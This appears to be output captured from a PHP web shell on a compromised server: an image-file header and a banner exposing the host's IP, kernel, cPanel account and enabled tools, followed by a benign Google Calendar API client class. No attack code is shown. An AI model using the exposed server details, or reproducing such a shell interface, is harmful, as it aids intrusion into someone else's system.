����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 216.73.216.45 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/google/apiclient-services/src/Google/Service/Calendar/ |
Upload File : |
<?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ class Google_Service_Calendar_Event extends Google_Collection { protected $collection_key = 'recurrence'; public $anyoneCanAddSelf; protected $attachmentsType = 'Google_Service_Calendar_EventAttachment'; protected $attachmentsDataType = 'array'; protected $attendeesType = 'Google_Service_Calendar_EventAttendee'; protected $attendeesDataType = 'array'; public $attendeesOmitted; public $colorId; protected $conferenceDataType = 'Google_Service_Calendar_ConferenceData'; protected $conferenceDataDataType = ''; public $created; protected $creatorType = 'Google_Service_Calendar_EventCreator'; protected $creatorDataType = ''; public $description; protected $endType = 'Google_Service_Calendar_EventDateTime'; protected $endDataType = ''; public $endTimeUnspecified; public $etag; protected $extendedPropertiesType = 'Google_Service_Calendar_EventExtendedProperties'; protected $extendedPropertiesDataType = ''; protected $gadgetType = 'Google_Service_Calendar_EventGadget'; protected $gadgetDataType = ''; public $guestsCanInviteOthers; public $guestsCanModify; public $guestsCanSeeOtherGuests; public $hangoutLink; public $htmlLink; public $iCalUID; public $id; public $kind; public $location; public $locked; protected $organizerType = 'Google_Service_Calendar_EventOrganizer'; protected $organizerDataType = ''; protected $originalStartTimeType = 'Google_Service_Calendar_EventDateTime'; protected $originalStartTimeDataType = ''; public $privateCopy; public $recurrence; public $recurringEventId; protected $remindersType = 'Google_Service_Calendar_EventReminders'; protected $remindersDataType = ''; public $sequence; protected $sourceType = 'Google_Service_Calendar_EventSource'; protected $sourceDataType = ''; protected $startType = 'Google_Service_Calendar_EventDateTime'; protected $startDataType = ''; public $status; public $summary; public $transparency; public $updated; public $visibility; public function setAnyoneCanAddSelf($anyoneCanAddSelf) { $this->anyoneCanAddSelf = $anyoneCanAddSelf; } public function getAnyoneCanAddSelf() { return $this->anyoneCanAddSelf; } /** * @param Google_Service_Calendar_EventAttachment */ public function setAttachments($attachments) { $this->attachments = $attachments; } /** * @return Google_Service_Calendar_EventAttachment */ public function getAttachments() { return $this->attachments; } /** * @param Google_Service_Calendar_EventAttendee */ public function setAttendees($attendees) { $this->attendees = $attendees; } /** * @return Google_Service_Calendar_EventAttendee */ public function getAttendees() { return $this->attendees; } public function setAttendeesOmitted($attendeesOmitted) { $this->attendeesOmitted = $attendeesOmitted; } public function getAttendeesOmitted() { return $this->attendeesOmitted; } public function setColorId($colorId) { $this->colorId = $colorId; } public function getColorId() { return $this->colorId; } /** * @param Google_Service_Calendar_ConferenceData */ public function setConferenceData(Google_Service_Calendar_ConferenceData $conferenceData) { $this->conferenceData = $conferenceData; } /** * @return Google_Service_Calendar_ConferenceData */ public function getConferenceData() { return $this->conferenceData; } public function setCreated($created) { $this->created = $created; } public function getCreated() { return $this->created; } /** * @param Google_Service_Calendar_EventCreator */ public function setCreator(Google_Service_Calendar_EventCreator $creator) { $this->creator = $creator; } /** * @return Google_Service_Calendar_EventCreator */ public function getCreator() { return $this->creator; } public function setDescription($description) { $this->description = $description; } public function getDescription() { return $this->description; } /** * @param Google_Service_Calendar_EventDateTime */ public function setEnd(Google_Service_Calendar_EventDateTime $end) { $this->end = $end; } /** * @return Google_Service_Calendar_EventDateTime */ public function getEnd() { return $this->end; } public function setEndTimeUnspecified($endTimeUnspecified) { $this->endTimeUnspecified = $endTimeUnspecified; } public function getEndTimeUnspecified() { return $this->endTimeUnspecified; } public function setEtag($etag) { $this->etag = $etag; } public function getEtag() { return $this->etag; } /** * @param Google_Service_Calendar_EventExtendedProperties */ public function setExtendedProperties(Google_Service_Calendar_EventExtendedProperties $extendedProperties) { $this->extendedProperties = $extendedProperties; } /** * @return Google_Service_Calendar_EventExtendedProperties */ public function getExtendedProperties() { return $this->extendedProperties; } /** * @param Google_Service_Calendar_EventGadget */ public function setGadget(Google_Service_Calendar_EventGadget $gadget) { $this->gadget = $gadget; } /** * @return Google_Service_Calendar_EventGadget */ public function getGadget() { return $this->gadget; } public function setGuestsCanInviteOthers($guestsCanInviteOthers) { $this->guestsCanInviteOthers = $guestsCanInviteOthers; } public function getGuestsCanInviteOthers() { return $this->guestsCanInviteOthers; } public function setGuestsCanModify($guestsCanModify) { $this->guestsCanModify = $guestsCanModify; } public function getGuestsCanModify() { return $this->guestsCanModify; } public function setGuestsCanSeeOtherGuests($guestsCanSeeOtherGuests) { $this->guestsCanSeeOtherGuests = $guestsCanSeeOtherGuests; } public function getGuestsCanSeeOtherGuests() { return $this->guestsCanSeeOtherGuests; } public function setHangoutLink($hangoutLink) { $this->hangoutLink = $hangoutLink; } public function getHangoutLink() { return $this->hangoutLink; } public function setHtmlLink($htmlLink) { $this->htmlLink = $htmlLink; } public function getHtmlLink() { return $this->htmlLink; } public function setICalUID($iCalUID) { $this->iCalUID = $iCalUID; } public function getICalUID() { return $this->iCalUID; } public function setId($id) { $this->id = $id; } public function getId() { return $this->id; } public function setKind($kind) { $this->kind = $kind; } public function getKind() { return $this->kind; } public function setLocation($location) { $this->location = $location; } public function getLocation() { return $this->location; } public function setLocked($locked) { $this->locked = $locked; } public function getLocked() { return $this->locked; } /** * @param Google_Service_Calendar_EventOrganizer */ public function setOrganizer(Google_Service_Calendar_EventOrganizer $organizer) { $this->organizer = $organizer; } /** * @return Google_Service_Calendar_EventOrganizer */ public function getOrganizer() { return $this->organizer; } /** * @param Google_Service_Calendar_EventDateTime */ public function setOriginalStartTime(Google_Service_Calendar_EventDateTime $originalStartTime) { $this->originalStartTime = $originalStartTime; } /** * @return Google_Service_Calendar_EventDateTime */ public function getOriginalStartTime() { return $this->originalStartTime; } public function setPrivateCopy($privateCopy) { $this->privateCopy = $privateCopy; } public function getPrivateCopy() { return $this->privateCopy; } public function setRecurrence($recurrence) { $this->recurrence = $recurrence; } public function getRecurrence() { return $this->recurrence; } public function setRecurringEventId($recurringEventId) { $this->recurringEventId = $recurringEventId; } public function getRecurringEventId() { return $this->recurringEventId; } /** * @param Google_Service_Calendar_EventReminders */ public function setReminders(Google_Service_Calendar_EventReminders $reminders) { $this->reminders = $reminders; } /** * @return Google_Service_Calendar_EventReminders */ public function getReminders() { return $this->reminders; } public function setSequence($sequence) { $this->sequence = $sequence; } public function getSequence() { return $this->sequence; } /** * @param Google_Service_Calendar_EventSource */ public function setSource(Google_Service_Calendar_EventSource $source) { $this->source = $source; } /** * @return Google_Service_Calendar_EventSource */ public function getSource() { return $this->source; } /** * @param Google_Service_Calendar_EventDateTime */ public function setStart(Google_Service_Calendar_EventDateTime $start) { $this->start = $start; } /** * @return Google_Service_Calendar_EventDateTime */ public function getStart() { return $this->start; } public function setStatus($status) { $this->status = $status; } public function getStatus() { return $this->status; } public function setSummary($summary) { $this->summary = $summary; } public function getSummary() { return $this->summary; } public function setTransparency($transparency) { $this->transparency = $transparency; } public function getTransparency() { return $this->transparency; } public function setUpdated($updated) { $this->updated = $updated; } public function getUpdated() { return $this->updated; } public function setVisibility($visibility) { $this->visibility = $visibility; } public function getVisibility() { return $this->visibility; } }